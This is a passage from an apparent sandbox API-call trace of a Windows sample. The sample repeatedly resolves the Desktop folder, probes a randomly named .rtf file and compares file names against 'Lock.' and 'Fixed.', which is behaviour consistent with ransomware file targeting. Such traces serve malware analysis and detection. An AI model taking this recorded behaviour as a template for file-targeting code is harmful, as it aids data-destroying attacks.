Flags=0x0, Size=0x8) returned 0x2a726a8 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0103.176] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.176] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6648 [0103.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a759c0 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6648 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0103.178] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MdUrzCG7I8VQVwhMz8.rtf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf", lpFilePart=0x8cf650*="MdUrzCG7I8VQVwhMz8.rtf") returned 0x2e [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.178] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MdUrzCG7I8VQVwhMz8.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\mdurzcg7i8vqvwhmz8.rtf")) returned 0xffffffff [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a759c0 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.178] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0103.222] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.222] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MH23a5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H23a5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23a5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3a5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0103.223] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f70c0 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0103.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MH23a5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H23a5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="23a5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3a5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a5.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.225] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0103.225] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0103.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0103.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0103.225] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.225] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0103.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0103.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75498 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0103.227] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.227] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0103.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) 